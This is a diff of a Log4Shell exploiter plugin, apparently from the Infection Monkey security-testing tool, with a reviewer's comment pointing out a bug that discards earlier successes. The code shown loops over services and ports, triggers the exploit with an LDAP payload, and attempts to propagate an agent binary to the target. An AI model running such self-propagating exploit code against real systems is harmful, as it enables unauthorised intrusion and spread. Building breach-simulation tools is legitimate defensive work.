monkey/agent_plugins/exploiters/log4shell/src/log4shell_exploit_client.py

```diff
@@ -0,0 +1,218 @@
+        url: str,
+        command: str,
+        ports_to_try: Set[NetworkPort],
+        interrupt: Event,
+    ) -> Tuple[bool, bool]:
+        exploitation_success = False
+        propagation_success = False
+        try:
+            exploitation_success, propagation_success = self._run_exploit(
+                target_host,
+                command,
+                options,
+                ldap_port,
+                agent_binary_downloaded,
+                exploit_class_downloaded,
+                ports_to_try,
+                interrupt,
+            )
+            exploitation_message = "" if exploitation_success else f"Failed to exploit via {url}"
+        except Exception as err:
+            logger.exception("An exception was encountered while attempting to exploit Log4Shell")
+            exploitation_message = str(err)
+
+        self._publish_exploitation_event(
+            target_host, success=exploitation_success, error_message=exploitation_message
+        )
+
+        return exploitation_success, propagation_success
+
+    def _run_exploit(
+        self,
+        target_host: TargetHost,
+        command: str,
+        options: Log4ShellOptions,
+        ldap_port: NetworkPort,
+        agent_binary_downloaded: Event,
+        exploit_class_downloaded: Event,
+        ports_to_try: Set[NetworkPort],
+        interrupt: Event,
+    ) -> Tuple[bool, bool]:
+        exploitation_success = False
+        propagation_success = False
+
+        for service_exploit in get_log4shell_service_exploiters():
+            for port in interruptible_iter(ports_to_try, interrupt):
+                logger.debug(
+                    f'Attempting Log4Shell exploit for service "{service_exploit.service_name}"'
+                    f"on port {port}"
+                )
+                try:
+                    timestamp = time()
+                    service_exploit.trigger_exploit(
+                        Log4ShellExploitClient._build_ldap_payload(target_host, ldap_port),
+                        target_host,
+                        port,
+                    )
+                    exploitation_success, propagation_success = self._propagate(
+                        target_host,
+                        timestamp,
+                        options,
+                        agent_binary_downloaded,
+                        exploit_class_downloaded,
+                    )
+                except Exception as err:
+                    error_message = (
+                        "An error occurred while attempting to exploit Log4Shell on a "
+                        f"potential {service_exploit.service_name} service: {err}"
+                    )
+                    logger.warning(error_message)
+                    self._publish_exploitation_event(
+                        target_host, timestamp, False, error_message=error_message
+                    )
+
+        return exploitation_success, propagation_success
```

Comment:
The logic is flawed here. This function will always return the last values of these variables. What if a service was exploited successfully before that?